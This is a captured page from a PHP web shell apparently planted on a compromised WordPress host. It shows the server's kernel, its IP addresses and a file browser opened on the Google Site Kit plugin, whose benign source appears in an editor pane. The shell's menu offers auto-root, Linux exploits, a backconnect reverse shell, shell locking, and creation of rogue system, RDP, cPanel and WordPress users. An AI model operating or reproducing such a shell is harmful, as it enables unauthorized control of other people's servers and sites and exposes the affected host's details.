Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.221.61.135
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Modules /
[ HOME SHELL ]
Name
Size
Permission
Action
Tags
[ DIR ]
drwxr-xr-x
Datapoint.php
2.23
KB
-rw-r--r--
Module.php
22.54
KB
-rw-r--r--
Module_Registry.php
1.61
KB
-rw-r--r--
Module_Settings.php
1.95
KB
-rw-r--r--
Module_Sharing_Settings.php
6.64
KB
-rw-r--r--
Module_With_Activation.php
569
B
-rw-r--r--
Module_With_Assets.php
944
B
-rw-r--r--
Module_With_Assets_Trait.php
1.74
KB
-rw-r--r--
Module_With_Data_Available_Sta...
1.01
KB
-rw-r--r--
Module_With_Data_Available_Sta...
1.51
KB
-rw-r--r--
Module_With_Deactivation.php
579
B
-rw-r--r--
Module_With_Debug_Fields.php
558
B
-rw-r--r--
Module_With_Owner.php
574
B
-rw-r--r--
Module_With_Owner_Trait.php
1.73
KB
-rw-r--r--
Module_With_Persistent_Registr...
645
B
-rw-r--r--
Module_With_Scopes.php
621
B
-rw-r--r--
Module_With_Scopes_Trait.php
722
B
-rw-r--r--
Module_With_Service_Entity.php
680
B
-rw-r--r--
Module_With_Settings.php
534
B
-rw-r--r--
Module_With_Settings_Trait.php
1008
B
-rw-r--r--
Module_With_Tag.php
671
B
-rw-r--r--
Module_With_Tag_Trait.php
1.65
KB
-rw-r--r--
Modules.php
25
KB
-rw-r--r--
REST_Dashboard_Sharing_Control...
3.55
KB
-rw-r--r--
REST_Modules_Controller.php
25.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Module_With_Owner_Trait.php
<?php /** * Trait Google\Site_Kit\Core\Modules\Module_With_Owner_Trait * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Modules; use Google\Site_Kit\Core\Authentication\Clients\OAuth_Client; use Google\Site_Kit\Core\Authentication\Profile; use Google\Site_Kit\Core\Authentication\Token; use Google\Site_Kit\Core\Storage\User_Options; /** * Trait for a module that includes an owner ID. * * @since 1.16.0 * @access private * @ignore */ trait Module_With_Owner_Trait { /** * OAuth_Client instance. * * @since 1.77.0. * @var OAuth_Client */ protected $owner_oauth_client; /** * Gets an owner ID for the module. * * @since 1.16.0 * * @return int Owner ID. */ public function get_owner_id() { if ( ! $this instanceof Module_With_Settings ) { return 0; } $settings = $this->get_settings()->get(); if ( empty( $settings['ownerID'] ) ) { return 0; } return $settings['ownerID']; } /** * Gets the OAuth_Client instance for the module owner. * * @since 1.77.0 * * @return OAuth_Client OAuth_Client instance. */ public function get_owner_oauth_client() { if ( $this->owner_oauth_client instanceof OAuth_Client ) { return $this->owner_oauth_client; } $user_options = new User_Options( $this->context, $this->get_owner_id() ); $this->owner_oauth_client = new OAuth_Client( $this->context, $this->options, $user_options, $this->authentication->credentials(), $this->authentication->get_google_proxy(), new Profile( $user_options ), new Token( $user_options ) ); return $this->owner_oauth_client; } }
Close